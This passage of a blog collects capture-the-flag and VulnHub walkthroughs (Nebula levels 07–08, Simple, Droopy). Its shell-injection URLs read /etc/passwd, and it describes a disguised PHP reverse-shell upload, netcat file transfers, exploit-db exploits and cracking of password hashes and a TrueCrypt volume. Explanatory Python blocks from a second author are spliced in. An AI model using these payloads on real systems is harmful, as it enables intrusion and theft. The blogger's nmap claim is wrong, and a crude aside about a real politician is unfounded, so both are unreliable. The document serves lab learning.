    foreach $line (@output) { print "$line"; }

    print("</pre></body></html>");

  }

  # check if Host set. if not, display normal page, etc

  ping(param("Host"));

I had never really looked at perl-code before. But it kind of made some sense I guess.

The config-file specified a port

# Specifies an alternate port number to listen on.
port=7007
dir=/home/flag07

So I found that port and started curling to see what I could run. After a lot of trial and error
I found a way to do it:

curl “http://nebula.dev:7007/index.cgi?Host=www.google.com|getflag”
I also learned that you have to encode spaces correctly, otherwise the server gets all confused. So if you want to run any command with spaces you do it like this:
http://nebula.dev:7007/index.cgi?Host=%3Bcat%20/etc/passwd

I had to encode the semicolon. That was the key to it!
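The CGI script is vulnerable because it interpolates param("Host") straight into a backtick command, which Perl runs through /bin/sh; the percent-encoding only matters because the web server decodes it before the string reaches the shell. The following added example (my code, not the level's Perl) shows the same flow in Python: what the parameter looks like after decoding, the vulnerable shell call with echo standing in for ping so it runs offline, and a hardened version that validates the hostname and executes without a shell. The hostname pattern is a conservative RFC 1123 shape and is my choice.

```python
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# RFC 1123 style hostname: labels of letters, digits and inner hyphens.
# Anything else (';', '|', '&', spaces, ...) is rejected outright.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")

def host_param(url):
    """What CGI.pm's param("Host") sees: the query value, percent-decoded,
    so %3B is ';' and %20 is ' ' by the time it reaches the backticks."""
    return parse_qs(urlsplit(url).query).get("Host", [""])[0]

def vulnerable_ping(host, binary="ping"):
    """The backtick call from index.cgi: the whole string goes to /bin/sh.
    `binary` is swappable so the demo can run offline with echo instead."""
    cmd = "%s -c 3 %s 2>&1" % (binary, host)
    return subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True).stdout

def safe_ping_argv(host):
    """Hardened form: validate, then build argv for a no-shell exec.
    Raises ValueError instead of trying to escape bad input."""
    if not HOSTNAME_RE.match(host):
        raise ValueError("refusing host %r" % host)
    return ["ping", "-c", "3", host]

def safe_ping(host):
    """Run the validated command without a shell."""
    return subprocess.run(safe_ping_argv(host), capture_output=True, text=True).stdout

if __name__ == "__main__":
    evil = host_param("http://nebula.dev:7007/index.cgi?Host=%3Bcat%20/etc/passwd")
    print("decoded parameter:", repr(evil))
    print(vulnerable_ping("127.0.0.1; printf INJECTED", binary="echo"))
    try:
        safe_ping_argv(evil)
    except ValueError as e:
        print("hardened version:", e)
```

Validation before the exec, rather than quoting inside the shell string, is the point: a whitelist of what a hostname may look like is short and stable, while the set of characters a shell treats specially is not.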

Level 08

This is for sure my favorite level so far. I really enjoy analyzing packets.
So first I moved the pcap-file to my computer with netcat, and then I opened it up in wireshark.

There were no HTTP requests, so I guess this traffic was not on the web.

There are two machines talking:
59.233.235.218 – 39247
59.233.235.223 – 12121

So looking at the packets we can tell that the machines are in Beijing, both of them. The source and destination coordinates show that they are in the same place.
After looking up the ports I found this:
http://www.speedguide.net/port.php?port=12121

12121 	tcp 	trojans 	Backdoor.Balkart (2004.09.02) - a backdoor trojan horse that can act as a HTTP proxy or FTP server

Port is also IANA registered for NuPaper Session Service 	SG
12121 	tcp,udp 	nupaper-ss 	NuPaper Session Service 	IANA
12121 	tcp 	threat 	Balkart

Even though it doesn't really say in the challenge what kind of traffic this is, I like to imagine that it was someone who had infected the 12121 computer with the Balkart trojan. This one. But it doesn't really matter, it is irrelevant for this challenge.

So I went over the packets and found some interesting ones.

 0000   ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 30 ff  .. .38400,38400.
 0010   f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 ff f0  ...#.SodaCan:0..
 0020   ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 6f 64  ..'..DISPLAY.Sod
 0030   61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74 65 72  aCan:0......xter
 0040   6d ff f0                                         m..

But I couldn't piece it all together. So after analyzing every single packet separately, I realized that the packets come and go in an order that doesn't make sense on its own. So I learned something really useful: right-click on a packet and then
click on Follow, and then TCP Stream. This way we can see the full interaction, all packets combined into one.

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b....	B.
..............................1.......!.."......"......!..........."........"..".............	..
.....................
Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

..wwwbugs login: l.le.ev.ve.el.l8.8
level8
..
Password: backdoor...00Rm8.ate

Password: backd00Rmate
.
..
Login incorrect
wwwbugs login:

So the password looked pretty strange, and it didn't work. But after I checked the TCP stream in hex it became clear that the dots in the password were 0x7f bytes. 0x7f is DEL, so every 0x7f was the user deleting a letter. I guess he/she has problems remembering his/her own password.
So this:
Password: backdoor…00Rm8.ate
Became this:
Password: backd00Rmate
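Two things in this stream are worth automating: the telnet option negotiation at the start (the ff fa ... ff f0 blocks in the hexdump above, which leak the terminal type, speed and X display of the client) and the replay of the keystrokes, where 0x7f erases the previous character. The block below is an added example, mine rather than anything from the level, that parses both. The negotiation bytes are copied from the hexdump shown earlier; the password keystrokes are constructed from the description of the session.

```python
import re

IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
DEL = 0x7F
OPTION_NAMES = {0x18: "TERMINAL-TYPE", 0x20: "TERMINAL-SPEED",
                0x23: "X-DISPLAY-LOCATION", 0x27: "NEW-ENVIRON"}

# Negotiation block from the capture (the hexdump above, offsets and ASCII
# column removed).
CAPTURE = bytes.fromhex(
    "ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 30 ff"
    "f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 ff f0"
    "ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 6f 64"
    "61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74 65 72"
    "6d ff f0")

# Constructed: what the client sent at the password prompt, DEL included.
PASSWORD_KEYSTROKES = b"backdoor\x7f\x7f\x7f00Rm8\x7fate"

def telnet_split(data):
    """Walk a raw telnet byte stream and separate option negotiation from
    user data. Returns (subnegotiations, payload): a list of (option, body)
    pairs and the bytes that were not protocol."""
    subs, payload, i = [], bytearray(), 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            payload.append(b)
            i += 1
            continue
        if i + 1 >= len(data):
            break
        cmd = data[i + 1]
        if cmd == SB:                              # IAC SB <option> ... IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            if end < 0:
                break
            subs.append((data[i + 2], bytes(data[i + 3:end])))
            i = end + 2
        elif cmd in (WILL, WONT, DO, DONT):        # three-byte option command
            i += 3
        elif cmd == IAC:                           # escaped 0xFF data byte
            payload.append(IAC)
            i += 2
        else:                                      # other two-byte command
            i += 2
    return subs, bytes(payload)

def decode_subneg(option, body):
    """Render one subnegotiation body as (name, text). The first body byte is
    IS (0) or SEND (1); NEW-ENVIRON then carries VAR/USERVAR name VALUE value."""
    name = OPTION_NAMES.get(option, "option-%d" % option)
    if option == 0x27:
        pairs = []
        for entry in re.split(b"[\x00\x03]", body[1:]):
            if entry:
                k, _, v = entry.partition(b"\x01")
                pairs.append("%s=%s" % (k.decode("ascii", "replace"), v.decode("ascii", "replace")))
        return name, ";".join(pairs)
    return name, body[1:].decode("ascii", "replace")

def negotiated(data):
    """Option name -> decoded value for every subnegotiation in the stream."""
    return dict(decode_subneg(o, b) for o, b in telnet_split(data)[0])

def apply_deletes(keystrokes):
    """Replay what the user typed: DEL (0x7f) erases the previous character.
    This is why the captured password looks longer than it really is."""
    out = []
    for b in keystrokes:
        if b == DEL:
            if out:
                out.pop()
        else:
            out.append(chr(b))
    return "".join(out)

if __name__ == "__main__":
    for k, v in negotiated(CAPTURE).items():
        print("%-20s %s" % (k, v))
    print("password:", apply_deletes(PASSWORD_KEYSTROKES))
```

The negotiation alone tells you the client ran xterm at 38400 baud with DISPLAY=SodaCan:0, which is the same kind of fingerprint a defender gets from a telnet honeypot. For a real capture you would feed telnet_split the client-to-server half of the stream (Wireshark's Follow TCP Stream can save one direction) and run apply_deletes on the payload it returns.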

Level 09

I will continue some other day.

Walkthrough Simple

I tried out another vulnerable machine. This one was called Simple. And can be found here.

So I started out as usual by locating the machine.

 $ netdiscover -r 192.168.1.1/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.1     e8:de:27:31:15:ee      1      60  TP-LINK TECHNOLOGIES CO.,LTD.
 192.168.1.103   08:00:27:60:21:5c      1      60  Cadmus Computer Systems

nmap -A -O -T4 -p- -vv 192.168.1.102

Only port 80 open. So I browsed over there.
I was met by the interface of some kind of news service called CuteNews. It had the version written on the first page: CuteNews v.2.0.3. And what I had learned from the last VM I did was that it is always a good idea to search for exploits (duh). So before going ahead with dirbuster/zap/nikto/whatever I just searched for CuteNews in exploit-db. And that was a great idea.
So I just checked out the very first one that came up, and it looked easy. It was this one. So I went ahead and created an account, renamed my php-reverse-shell.php to shell.jpg, then intercepted the upload with Burp Suite and changed the extension back to .php.
And then I just started nc with nc -lvp 4444. And after visiting cutenews.dev/uploads/avatar_username_shell.php I was rewarded with a shell.
I sent over my enumeration-script that I am working on with netcat.

nc -lvp 3333 > enum.sh
nc 192.168.1.103 < enum.sh

I soon found out that it has the same privesc-vulnerability as the machine I was working on the other day. So I already had the exploit ready to go. It was this one. I sent it over with netcat and then compiled it with gcc, then chmod +x. And then I was root, and got the flag in the /root folder.


Conclusion

I felt like all the hard work before really paid off on this one. I knew the exploits, I knew how to transfer files easily. This was a great little project.

Walkthrough Droopy

Another walkthrough. This time for the Droopy-vm. It can be found here on vulnhub.com

I tried out netdiscover, just to learn something new. I have seen that other people use it. It turns out that it works to find hosts on the network. It works by sending out ARP requests throughout the network and logging the requests. I am not really sure if nmap is using a different technique. But it is good to know that there is an alternative to nmap for it.

netdiscover -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.1.1     e8:de:27:31:15:ee      1      60  TP-LINK TECHNOLOGIES CO.,LTD.
 192.168.1.104   08:00:27:65:24:9c      1      60  Cadmus Computer Systems

So I ran nmap.

nmap -vvv -A -T4 -O 192.168.1.104

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries 
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php 
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ 
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ 
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ 
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...
MAC Address: 08:00:27:65:24:9C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4

First I thought that the MD5 was a flag or something. But then I read that that is the standard way for nmap to output if it doesn’t know the service.

The robots file is just filled with stuff.

Among the many files was this.
http://droopy.dev/CHANGELOG.txt
Drupal 7.30, 2014-07-24

This reminded me about a huge vulnerability that was in drupal a few years ago, that I had heard about.

I continued the scanning by running nikto and then checking out the info.php file to see what I could find.

This is some of the info.

http://droopy.dev/info.php
PHP Version 5.5.9-1ubuntu4.5
Hostname:Port droopy.knight139.co.uk:80 
User/Group www-data(33)/33 
Apache Version Apache/2.4.7 (Ubuntu) 
Loaded Modules core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php5 mod_rewrite mod_setenvif mod_status 

DOCUMENT_ROOT /var/www/html 
SERVER_ADMIN webmaster@localhost 

Mysql
Client API version 5.5.40 

PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 

The default apache-page was also found.
http://droopy.dev/index.html

I tried to brute-force the login. This made the server block my IP. And I also think I made it run out of memory or something, because it subsequently crashed. Great. So I restarted the VM fresh again. And this time I checked out the drupal-exploit.

So I searched for exploits on the exploit database.
There I found four exploits that are called something along the lines of: Drupal Core <= 7.32 – SQL Injection.
Or similar. Two were written in Python, two in PHP. I just picked one, downloaded it and ran it. Which was pretty stupid, because the exploit by default created a user with the username admin. So I overwrote the original user.
So once I later gained access and checked the database, I only found my own user. Otherwise I would have been able to crack the hash of the original user, and that password could have been good to know.

Anyhow, I gained access and after some googling I figured out how to allow PHP in Drupal (modules/php-filter). And I uploaded the php-reverse-shell.php that I found here:
/usr/share/laudanum/php/php-reverse-shell.php

Privilege escalation

Now I had a shell as user www-data. So I went to /tmp and started netcat to receive my enumeration script.

nc -lvp 3333 > enum.sh

Then I sent the file with:

nc 192.168.1.104 3333 < enum.sh

Then: chmod +x enum.sh

Among other things I found:

uid=1000(gsuser) gid=1000(gsuser) groups=1000(gsuser),24(cdrom),30(dip),46(plugdev),110(lpadmin
hostname is:
HOSTNAME=dhcppc5
#In the hosts file I find this.
127.0.1.1	droopy.knight139.co.uk	droopy

I remembered that every web application backed by MySQL keeps its database credentials in a config file somewhere. So after some snooping around I found the file:

/var/www/html/sites/default

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'nimda',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

So I log in to mysql.

mysql -u drupaluser -p drupal
password: nimda

SHOW tables;

mysql> SELECT * FROM users;

$S$DLx/ePXpg18r5tnZs8aHkngNTWpyjyMLvPvC0gdaEjo4agY8Iyym

So I went here: http://www.onlinehashcrack.com/hash-identification.php#res
To identify what type of hash it was.

It turns out it is a SHA-512.
– SHA-512(Drupal)

I studied the hashcat options and ended up with this:

hashcat -m 7900 -a 0 -o found.txt admin.hash rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule

7900 is the Drupal 7 mode. -a 0 is a straight dictionary attack, so the wordlist (here rockyou.txt) is a positional argument after the hash file, and a rule file has to be given with -r; otherwise hashcat treats the rule file itself as the wordlist.
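As an added example (not from the walkthrough), here is a small Python implementation of the Drupal 7 `$S$` password-hash format as laid out in Drupal's includes/password.inc: it decodes the iteration count and salt from the string pulled out of the users table above, recomputes the hash for a guess, and compares in constant time. This is the scheme hashcat mode 7900 implements, and it shows why the fourth character matters: 'D' means 2^15 = 32768 rounds of SHA-512 per guess, which is what makes a large wordlist expensive. The page's hash is only parsed; the demo salt, demo password and candidate list are constructed here so the verification path runs offline.

```python
import hashlib
import hmac

# Drupal 7 password hashes ($S$...) use a phpass-style scheme from
# includes/password.inc: iterated SHA-512 over salt+password, encoded with
# this custom base64 alphabet, and truncated to 55 characters.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT

# Hash taken from the walkthrough above (only parsed here, not cracked).
PAGE_HASH = "$S$DLx/ePXpg18r5tnZs8aHkngNTWpyjyMLvPvC0gdaEjo4agY8Iyym"

# Constructed demo values so the verification path is reproducible offline.
DEMO_SALT = "Lx/ePXpg"           # same salt as the page hash, reused on purpose
DEMO_PASSWORD = "correct-horse"  # constructed, not a password from the VM


def _drupal_b64(data: bytes) -> str:
    """Drupal's base64: 3 input bytes -> 4 alphabet chars, low bits first."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_drupal_hash(stored: str) -> dict:
    """Split a $S$ hash into its parts; the 4th char encodes log2(iterations)."""
    if not stored.startswith("$S$") or len(stored) != HASH_LENGTH:
        raise ValueError("not a Drupal 7 $S$ hash")
    log2 = ITOA64.find(stored[3])
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        raise ValueError("iteration count outside Drupal's allowed range")
    return {
        "algorithm": "sha512",  # what hashcat -m 7900 implements
        "log2_rounds": log2,
        "iterations": 1 << log2,
        "salt": stored[4:12],
        "digest": stored[12:],
    }


def drupal_hash(password: str, salt: str, log2_rounds: int = 15) -> str:
    """Recompute a Drupal 7 hash for password with the given salt and cost."""
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 chars from the Drupal alphabet")
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("ascii") + pw).digest()
    for _ in range(1 << log2_rounds):  # Drupal: do {...} while (--$count)
        digest = hashlib.sha512(digest + pw).digest()
    setting = "$S$" + ITOA64[log2_rounds] + salt
    return (setting + _drupal_b64(digest))[:HASH_LENGTH]


def verify_password(password: str, stored: str) -> bool:
    """Constant-time comparison of a recomputed hash against the stored one."""
    parts = parse_drupal_hash(stored)
    candidate = drupal_hash(password, parts["salt"], parts["log2_rounds"])
    return hmac.compare_digest(candidate, stored)


def audit_hash(stored, candidates):
    """Return the first candidate that matches the stored hash, else None."""
    for pw in candidates:
        if verify_password(pw, stored):
            return pw
    return None


if __name__ == "__main__":
    parts = parse_drupal_hash(PAGE_HASH)
    print(f"page hash: salt={parts['salt']} iterations={parts['iterations']}")
    demo = drupal_hash(DEMO_PASSWORD, DEMO_SALT)
    print("demo hash:", demo)
    print("matched:", audit_hash(demo, ["password", "nimda", DEMO_PASSWORD]))
```

Each call to verify_password costs 32768 SHA-512 rounds at the default cost, so a pure-Python audit is only practical for a handful of guesses; that per-guess cost is exactly what hashcat's GPU implementation of mode 7900 is paying for, and it is the reason the iteration count is stored in the hash rather than fixed in code.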

Meanwhile I continued to look around and found an email in /var/spool/mail:

From Dave <dave@droopy.example.com> Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave <dave@droopy.example.com>
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave

Okay, so it talks about an encrypted file. From a guy named Dave.

It looks like the encrypted file can be decrypted with a password that is found in the rockyou dictionary.
We also know that the password is less than 11 characters, and it has something to do with an academy.
And it is also the name of a song by the Jam.

So I started listening to some songs by The Jam and started looking for the encrypted file. But I couldn’t really find anything useful.

After some minor cheating I learned that it is a good idea to look for privilege-escalation exploits. So I searched the exploit database again and found several exploits. I downloaded this one: https://www.exploit-db.com/exploits/37292/
Transferred it over to the VM with nc. Then gcc, chmod and execute, and now I am root. BOOM! Fast when stuff just works.

In /root I found a file called dave.tc.
After some googling I found out that .tc is probably a TrueCrypt file. And after some more googling I learned that there is a program called truecrack.
After a lot of struggling I found that with sed we can remove all words in our dictionary that are shorter than 11 characters.

I did it with this command.
The -i flag is important: it edits the file in place. Without it the filtered list only goes to the terminal and the file is left unchanged. As I learned.

sed -i -r '/^.{0,10}$/d' rr.txt   

So now we have a list with 1.8 million words.
wc -l rr.txt
1879453 rr.txt

Then I did
grep acade rr.txt > rr2.txt

To get all words containing the word academy, as it was mentioned in the email.

Then again:

truecrack -t dave.tc -k sha512 -b 8 -w rr2.txt -v 

Found password:		"etonacademy"
Password length:	"12"

On this page I learned how to mount a truecrypt-volume. So I did that.
https://tails.boum.org/doc/encryption_and_privacy/truecrypt/index.en.html

cryptsetup open --type tcrypt dave.tc dave
mkdir /media/dave

mount /dev/mapper/dave /media/dave
ls /media/dave/
buller  lost+found  panama

In the buller dir there is a file called bullingdon-crest.
https://en.wikipedia.org/wiki/Bullingdon_Club

Now I get it. The Dave character is David Cameron. And I guess the shares.jpg refers to his corrupt family’s holdings in off-shore banks. And the pig in .secret is of course the infamous pig he most likely fucked. And in the .top dir is the flag. Pretty clever ending to a great VM!

Conclusion

So on this VM I really learned a lot!
The most important thing I think was: always check the exploit-database!
All it really took was to search for two exploits to gain root. First to enter drupal-admin and then to elevate to root.

I really liked it because it felt very real. The drupal and priv-escalation exploits are both very real. Thanks to knightmare for a great VM!